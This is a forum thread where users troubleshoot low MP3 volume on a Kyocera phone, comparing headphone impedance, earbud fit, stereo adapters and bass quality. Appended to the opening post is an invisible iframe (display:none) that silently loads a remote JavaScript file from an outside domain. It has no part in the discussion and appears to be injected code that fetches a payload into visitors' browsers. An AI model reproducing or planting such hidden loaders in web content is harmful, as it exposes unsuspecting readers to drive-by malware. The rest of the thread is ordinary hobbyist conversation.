+ Reply to Thread

mp3 player volume too low

I have been using the MP3 player with the Kyocera headphones. I find that its maximum volume is quite low. Has anyone else had this problem?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I haven't heard of that problem, but I do know that different headphones will produce different volume levels. The lower the impedance of the drivers the louder it will get. I'm using a set of Sony headphones that are 16 ohms and they get much louder than the Kyocera earbuds. I'm going to transplant these onto a Kyocera headset as the initial customized Cool Cat headset.
    Sorry, but I no longer make 7135 headset adapters.

Re: mp3 player volume too low

Originally posted by kilkennykat
    I have been using the MP3 player with the Kyocera headphones. I find that its maximum volume is quite low. Has anyone else had this problem?
    I find that the volume varies greatly depending on how well the Kyocera earbuds fit into your ears. When I can get a good fit, the volume is fine, but if they are loose, the volume is low. I've now gone to a Sony headset, using Coolcat's adapter. The volume and sound is great.

Are these new sony headphones improving the quality of the sound, you know extending the bass frequency, providing a full broad specturm sound etc... I'm going to Fry's to purchase some adapters and run my own test using various MP3 players/headphones and cd players. I'll let everyone know what I come up with.

Originally posted by Trespasser
    Are these new sony headphones improving the quality of the sound, you know extending the bass frequency, providing a full broad specturm sound etc... I'm going to Fry's to purchase some adapters and run my own test using various MP3 players/headphones and cd players. I'll let everyone know what I come up with.
    I wonder if you have a bad phone/headphone. I have excellent volumn levels with the kyocera, i end up keeping it at 25%-50% with the kyocera stereo headset. Try to find someone else that has this phone in your area to test it out.

Second, I think it's been covered before, but you can not use a standard 3.5-2.5 or vice versa for an adapter and still get stereo sound. The stereo plug has 4 metal rings for the connector which is different from the standard 2.5. Try getting an adapter from coolcat. Do a search for more info.

Third, if you can wait for the bebop Player to be released, it currently has a bass boost.

Originally posted by Trespasser
    I have a relatively cheap pair of Sony's that I stole....borrowed from my son. The sound is fine, though the bass is not very strong. I suspect it as much a function of the headphones, as the player. I have never been impressed with the small in the ear headphones, but they are easier to travel with. I am going to try a larger pair of over the ear phones to see how they sound.

thanks for the replies...I too found the bass fullness and impact to be the most lacking. The dynamic range just wan't there either. I look forward to your impressions with the other headphones